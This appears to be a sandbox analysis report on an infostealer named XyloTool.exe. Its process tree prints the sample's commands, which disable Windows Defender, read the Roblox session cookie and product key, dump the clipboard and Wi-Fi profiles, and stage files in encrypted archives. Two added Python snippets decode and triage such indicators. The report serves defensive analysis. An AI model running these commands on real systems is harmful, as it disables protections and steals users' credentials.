Analysis
- max time kernel: 595s
- max time network: 625s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-06-2024 19:04
Behavioral task behavioral1
- Sample: XyloTool.exe
- Resource: win7-20240611-en
Behavioral task behavioral2
- Sample: XyloTool.exe
- Resource: win10v2004-20240611-en
General
- Target: XyloTool.exe
- Size: 5.9MB
- MD5: 1bae503880fbeb67ea0df79e4123eb3f
- SHA1: 66f88a8d04503aa36f97153271e756b184915cfd
- SHA256: 6ba55b8fc0d8a37a2d5942c54d86c267d38fc4bd4bc1339dde80190ddf800980
- SHA512: bea868f8215a69ff0f72a67b04cb0eeb3030b1c830c700ca29b61f1e38ccddb5401ae3285b9101d3998480a31a8e7a5fe053ad2b464de6ffdfea36cda403e663
- SSDEEP: 98304:zN+nhj832i65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF29hGkr/LcQ:zAn4EDOYjJlpZstQoS9Hf12VKXpbGC0E
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 8 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  Processes (pid, process): 3512 powershell.exe; 2396 powershell.exe; 8072 powershell.exe; 7024 powershell.exe; 1564 powershell.exe; 4924 powershell.exe; 7648 powershell.exe; 6728 powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (13 IoCs)
  Processes (pid, process): 2028 rar.exe; 2000 winrar-x64-701.exe; 4836 XyloTool.exe; 7928 XyloTool.exe; 8420 rar.exe; 7888 XyloTool.exe; 3152 XyloTool.exe; 7688 rar.exe; 8912 XyloTool.exe; 9056 XyloTool.exe; 7260 rar.exe; 8480 XyloTool.exe; 8308 XyloTool.exe
- Loads dropped DLL (64 IoCs)
  Processes (pid, process): 4188 XyloTool.exe; 7928 XyloTool.exe; 3152 XyloTool.exe; 9056 XyloTool.exe (64 DLL-load events were recorded across these four processes; the repeated per-event entries are collapsed here)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- yara_rule upx (UPX-packed files)
  Matched dropped files under C:\Users\Admin\AppData\Local\Temp\_MEI50922\: python310.dll, _ctypes.pyd, libffi-7.dll, libcrypto-1_1.dll, _ssl.pyd, _sqlite3.pyd, _socket.pyd, _queue.pyd, _lzma.pyd, _hashlib.pyd, _decimal.pyd, _bz2.pyd, unicodedata.pyd, sqlite3.dll, select.pyd, libssl-1_1.dll
  Also matched the corresponding in-memory image regions of PID 4188 and PID 7928 (behavioral2 memory dumps; the per-region address list is omitted).
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 6 IoCs)
  Network flows (flow, ioc): 100 pastebin.com; 101 pastebin.com; 889 pastebin.com; 890 pastebin.com; 97 pastebin.com; 99 pastebin.com
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Network flows (flow, ioc): 29 ip-api.com; 881 ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 12 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Registry access (description, ioc, process): all 12 entries are by netsh.exe on \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh: Key opened (4), Key queried (4), Key value enumerated (4)
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Registry access (description, ioc, process):
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 (taskmgr.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
  - Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
- Checks processor information in registry (2 TTPs, 8 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Registry access (description, ioc, process):
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (taskmgr.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (firefox.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (taskmgr.exe)
- Detects videocard installed (1 TTPs, 4 IoCs)
  Uses WMIC.exe to determine videocard installed.
  Processes (pid, process): 3236 WMIC.exe; 3392 WMIC.exe; 4784 WMIC.exe; 1616 WMIC.exe
- Enumerates processes with tasklist (1 TTPs, 12 IoCs)
  Processes (pid, process): 1140 tasklist.exe; 9016 tasklist.exe; 7304 tasklist.exe; 3244 tasklist.exe; 4688 tasklist.exe; 752 tasklist.exe; 2800 tasklist.exe; 7120 tasklist.exe; 9076 tasklist.exe; 8352 tasklist.exe; 2172 tasklist.exe; 3524 tasklist.exe
- Gathers system information (1 TTPs, 4 IoCs)
  Runs systeminfo.exe.
  Processes (pid, process): 112 systeminfo.exe; 3260 systeminfo.exe; 5132 systeminfo.exe; 1780 systeminfo.exe
- Modifies registry class (3 IoCs)
  Registry access (description, ioc, process): Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings by firefox.exe, OpenWith.exe and taskmgr.exe
- NTFS ADS (2 IoCs)
  File activity (description, ioc, process):
  - File created: C:\Users\Admin\Downloads\XyloTool.rar:Zone.Identifier (firefox.exe)
  - File created: C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier (firefox.exe)
- Opens file in notepad (likely ransom note) (2 IoCs)
  Processes (pid, process): 8164 NOTEPAD.EXE; 7700 NOTEPAD.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid, process), repeated entries collapsed: powershell.exe with PIDs 1792, 2396, 4136, 1564, 3064, 5036, 1712, 1656, 8072, 3276, 6500, 4924, 9004, 9184, 8632, 1524, 8924, 7024, 8272, 7648, 8216, 3124
- Suspicious behavior: GetForegroundWindowSpam (3 IoCs)
  Processes (pid, process): 8144 OpenWith.exe; 7336 7zFM.exe; 8212 taskmgr.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token privileges (description, pid, process), repeated entries collapsed:
  - SeDebugPrivilege: tasklist.exe (3524, 752, 2800); powershell.exe (1792, 2396, 4136, 1564, 3064, 5036)
  - WMIC.exe 1184 (logged twice) and 1848: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privileges 33, 34, 35, 36 (for 1848 the list stops at SeDebugPrivilege because the report caps at 64 IoCs)
- Suspicious use of FindShellTrayWindow (64 IoCs)
  Processes (pid, process), repeated entries collapsed: 4044 firefox.exe; 7336 7zFM.exe; 8212 taskmgr.exe
- Suspicious use of SendNotifyMessage (63 IoCs)
  Processes (pid, process), repeated entries collapsed: 4044 firefox.exe; 8212 taskmgr.exe
- Suspicious use of SetWindowsHookEx (47 IoCs)
  Processes (pid, process), repeated entries collapsed: 4044 firefox.exe; 8144 OpenWith.exe; 2000 winrar-x64-701.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Parent -> child writes (pid process -> target pid process); each pair is logged twice in the raw report:
  - 5092 XyloTool.exe -> 4188 XyloTool.exe
  - 4188 XyloTool.exe -> cmd.exe with PIDs 1588, 3588, 804, 624, 3624, 644, 5072, 2176, 5036, 1424, 2872, 2736, 3236, 4440, 2756
  - 1588 cmd.exe -> 2396 powershell.exe
  - 3588 cmd.exe -> 1792 powershell.exe
  - 5072 cmd.exe -> 4136 powershell.exe
  - 2872 cmd.exe -> 1564 powershell.exe
  - 804 cmd.exe -> 752 tasklist.exe
  - 624 cmd.exe -> 3524 tasklist.exe
  - 644 cmd.exe -> 2800 tasklist.exe
  - 3624 cmd.exe -> 1184 WMIC.exe
  - 5036 cmd.exe -> 1676 netsh.exe
  - 1424 cmd.exe -> 112 systeminfo.exe
  - 2176 cmd.exe -> 4928 tree.com
  - 2736 cmd.exe -> 1740 tree.com
  - 3236 cmd.exe -> 1196 tree.com
  - 4440 cmd.exe -> 1648 tree.com
  - 2756 cmd.exe -> 1760 tree.com
  - 1564 powershell.exe -> 4428 csc.exe
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
1⤵ C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
   - Suspicious use of WriteProcessMemory
   PID: 5092
  2⤵ C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
     command line: "C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
     - Loads dropped DLL
     - Suspicious use of WriteProcessMemory
     PID: 4188
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'"
       - Suspicious use of WriteProcessMemory
       PID: 1588
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 2396
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
       - Suspicious use of WriteProcessMemory
       PID: 3588
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 1792
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
       - Suspicious use of WriteProcessMemory
       PID: 804
      4⤵ C:\Windows\system32\tasklist.exe
         command line: tasklist /FO LIST
         - Enumerates processes with tasklist
         - Suspicious use of AdjustPrivilegeToken
         PID: 752
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
       - Suspicious use of WriteProcessMemory
       PID: 624
      4⤵ C:\Windows\system32\tasklist.exe
         command line: tasklist /FO LIST
         - Enumerates processes with tasklist
         - Suspicious use of AdjustPrivilegeToken
         PID: 3524
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
       - Suspicious use of WriteProcessMemory
       PID: 3624
      4⤵ C:\Windows\System32\Wbem\WMIC.exe
         command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
         - Suspicious use of AdjustPrivilegeToken
         PID: 1184
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
       - Suspicious use of WriteProcessMemory
       PID: 5072
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell Get-Clipboard
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 4136
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
       - Suspicious use of WriteProcessMemory
       PID: 644
      4⤵ C:\Windows\system32\tasklist.exe
         command line: tasklist /FO LIST
         - Enumerates processes with tasklist
         - Suspicious use of AdjustPrivilegeToken
         PID: 2800
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
       - Suspicious use of WriteProcessMemory
       PID: 2176
      4⤵ C:\Windows\system32\tree.com
         command line: tree /A /F
         PID: 4928
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
       - Suspicious use of WriteProcessMemory
       PID: 5036
      4⤵ C:\Windows\system32\netsh.exe
         command line: netsh wlan show profile
         - Event Triggered Execution: Netsh Helper DLL
         PID: 1676
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "systeminfo"
       - Suspicious use of WriteProcessMemory
       PID: 1424
      4⤵ C:\Windows\system32\systeminfo.exe
         command line: systeminfo
         - Gathers system information
         PID: 112
    3⤵ C:\Windows\system32\cmd.exe
       command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
       - Suspicious use of WriteProcessMemory
       PID: 2872
      4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command blob omitted]
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5hhtixo\c5hhtixo.cmdline"5⤵PID:4428
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48B1.tmp" "c:\Users\Admin\AppData\Local\Temp\c5hhtixo\CSCD6BDBEF5704E4AB0A8A12B1D19DBE296.TMP"6⤵PID:4724
-
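The powershell.exe entry above carries a base64 `-EncodedCommand`, and the csc.exe and cvtres.exe children underneath it are the signature of `Add-Type` compiling C# at run time. Decoding the blob shows a GDI+ `CopyFromScreen` loop over `Screen.AllScreens` that saves one `Display (N).png` per monitor. The following decoder is an added example for triaging such entries, not code from the sandbox or from the sample: it pulls the encoded argument out of a command line (PowerShell accepts `-ec` and any prefix of `-EncodedCommand`), decodes the UTF-16LE payload, and lists the indicators seen on this page. `SAMPLE_SCRIPT` is a constructed, shortened script mirroring what the page's blob decodes to; the function and indicator names are the example's own.

```python
import base64
import binascii
import re

# PowerShell takes the encoded script as -EncodedCommand, its alias -ec, or any
# unambiguous prefix (-e, -en, -enc, ...). The value is base64 of UTF-16LE text.
_ARG = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/=]{8,})")

# Strings worth flagging in this report's scripts and command lines
INDICATORS = {
    "Add-Type": "compiles C# in-process (expect csc.exe and cvtres.exe children of powershell.exe)",
    "CopyFromScreen": "GDI+ screen capture",
    "AllScreens": "enumerates every monitor for capture",
    "Set-MpPreference": "changes Windows Defender settings",
    "Add-MpPreference": "adds Windows Defender exclusions",
    ".ROBLOSECURITY": "reads the Roblox session cookie from the registry",
    "Get-Clipboard": "reads clipboard contents",
}


def extract_encoded_command(cmdline: str):
    """Return the base64 argument of -EncodedCommand (or a prefix/alias), else None."""
    for flag, value in _ARG.findall(cmdline):
        f = flag.lower()
        if f == "ec" or "encodedcommand".startswith(f):
            return value
    return None


def decode_encoded_command(b64: str) -> str:
    """Decode the payload the way powershell.exe does: base64, then UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a valid -EncodedCommand payload: {exc}") from exc


def indicators(text: str):
    lowered = text.lower()
    return [name for name in INDICATORS if name.lower() in lowered]


def triage(cmdline: str) -> dict:
    """Decode an encoded command if present and report the indicators it contains."""
    b64 = extract_encoded_command(cmdline)
    script = decode_encoded_command(b64) if b64 else cmdline
    return {"encoded": b64 is not None, "script": script, "indicators": indicators(script)}


# Constructed sample: a condensed version of the screenshot script the page's blob decodes to.
SAMPLE_SCRIPT = (
    '$source = @"\r\n'
    "using System;\r\nusing System.Drawing;\r\nusing System.Windows.Forms;\r\n"
    "public class Screenshot {\r\n"
    "  public static Bitmap Capture(Screen s) {\r\n"
    "    var b = new Bitmap(s.Bounds.Width, s.Bounds.Height);\r\n"
    "    using (var g = Graphics.FromImage(b)) { g.CopyFromScreen(s.Bounds.Location, Point.Empty, s.Bounds.Size); }\r\n"
    "    return b;\r\n  }\r\n}\r\n"
    '"@\r\n'
    "Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms\r\n"
    "$i = 1\r\n"
    'foreach ($s in [System.Windows.Forms.Screen]::AllScreens) { [Screenshot]::Capture($s).Save("./Display ($i).png"); $i++ }\r\n'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {SAMPLE_B64}"

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("encoded:", result["encoded"])
    for name in result["indicators"]:
        print(f"  {name}: {INDICATORS[name]}")
    print(result["script"])
```

Run `triage()` over each powershell.exe command line in the tree; the plaintext entries (`Get-Clipboard`, the `.ROBLOSECURITY` registry reads, the `*-MpPreference` calls) are scored by the same indicator list without decoding. Note that `-Command` and `-File` arguments are not base64 and are left alone by the extractor.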
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:976
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2168
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *"3⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *4⤵
- Executes dropped EXE
PID:2028 -
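The rar.exe call above stages the collected files with `-hp"2006"`, which encrypts the file headers as well as the data, so the archive's file list is unreadable without the password; `-p` alone would have left the names visible. The output is named `16ZAa.zip`, but the console rar.exe writes RAR format regardless of the extension, so triage by magic bytes rather than by name. The classifier below is an added example, not part of the report or the sample: it recognises RAR5, RAR4 and ZIP signatures, reports whether headers (RAR) or the first entry (ZIP) are encrypted, and flags an extension that does not match the format. The byte strings are constructed test inputs with placeholder CRC fields; a real archive carries valid CRCs, which this example does not verify.

```python
import os
import struct

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
RAR4_SIG = b"Rar!\x1a\x07\x00"
ZIP_SIG = b"PK\x03\x04"
EXPECTED_EXT = {"rar5": {".rar"}, "rar4": {".rar"}, "zip": {".zip"}}


def _vint(data: bytes, off: int):
    """Decode a RAR5 variable-length integer: little-endian base-128, high bit = continue."""
    value, shift = 0, 0
    while True:
        byte = data[off]
        off += 1
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, off


def classify(data: bytes, filename: str) -> dict:
    """Identify the archive format, whether its headers/entries are encrypted, and an extension mismatch."""
    if data.startswith(RAR5_SIG):
        fmt = "rar5"
        off = len(RAR5_SIG) + 4                  # skip the 4-byte header CRC32
        _size, off = _vint(data, off)            # header size
        htype, _ = _vint(data, off)              # header type
        encrypted = htype == 4                   # type 4 = archive encryption header, always first when -hp is used
    elif data.startswith(RAR4_SIG):
        fmt = "rar4"
        # MAIN_HEAD follows the 7-byte marker: HEAD_CRC(2) HEAD_TYPE(1)=0x73 HEAD_FLAGS(2) HEAD_SIZE(2)
        flags = struct.unpack_from("<H", data, len(RAR4_SIG) + 3)[0]
        encrypted = bool(flags & 0x0080)         # MHD_PASSWORD: headers encrypted
    elif data.startswith(ZIP_SIG):
        fmt = "zip"
        # Local file header: signature(4) version(2) general-purpose flags(2) ...
        flags = struct.unpack_from("<H", data, 6)[0]
        encrypted = bool(flags & 0x0001)         # bit 0: this entry's data is encrypted; names stay visible
    else:
        return {"format": "unknown", "encrypted": False, "extension_mismatch": False}
    ext = os.path.splitext(filename)[1].lower()
    return {"format": fmt, "encrypted": encrypted, "extension_mismatch": ext not in EXPECTED_EXT[fmt]}


# Constructed samples (CRC fields zeroed; only the fields classify() reads are meaningful)
RAR5_HP = RAR5_SIG + b"\x00\x00\x00\x00" + b"\x0b" + b"\x04" + b"\x00" * 10      # encryption header first
RAR5_PLAIN = RAR5_SIG + b"\x00\x00\x00\x00" + b"\x07" + b"\x01" + b"\x00" * 6    # main header first
RAR4_HP = RAR4_SIG + b"\x00\x00" + b"\x73" + struct.pack("<H", 0x0080) + b"\x0d\x00" + b"\x00" * 6
ZIP_PLAIN = ZIP_SIG + b"\x14\x00" + b"\x00\x00" + b"\x00" * 22

if __name__ == "__main__":
    for name, blob in [("16ZAa.zip", RAR5_HP), ("plain.rar", RAR5_PLAIN), ("old.rar", RAR4_HP), ("a.zip", ZIP_PLAIN)]:
        print(name, classify(blob, name))
```

On a staged archive like the one above the result is `rar5`, headers encrypted, extension mismatch: enough to prioritise the file for password recovery (the `-hp` argument is visible in the command line) without opening it.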
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3200
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4836
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:2492
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4888
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3004
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4044 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.0.1548542661\2139289314" -parentBuildID 20230214051806 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8c4450c-f290-4eb3-a480-ab5f6ba382d5} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 1836 2feca6f1858 gpu3⤵PID:1020
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.1.615803478\657450740" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b67ab8a7-2fac-49df-8dae-1f0fde550550} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2404 2febe989958 socket3⤵PID:3060
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.2.1644332059\1435831737" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2888 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfed46cf-57bb-4606-a776-fa4d12b76d70} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2928 2fece417758 tab3⤵PID:3652
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.3.1230308447\1780318342" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d76516e-e026-47c4-be18-94165c9e9f14} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3680 2fed019e158 tab3⤵PID:1768
-
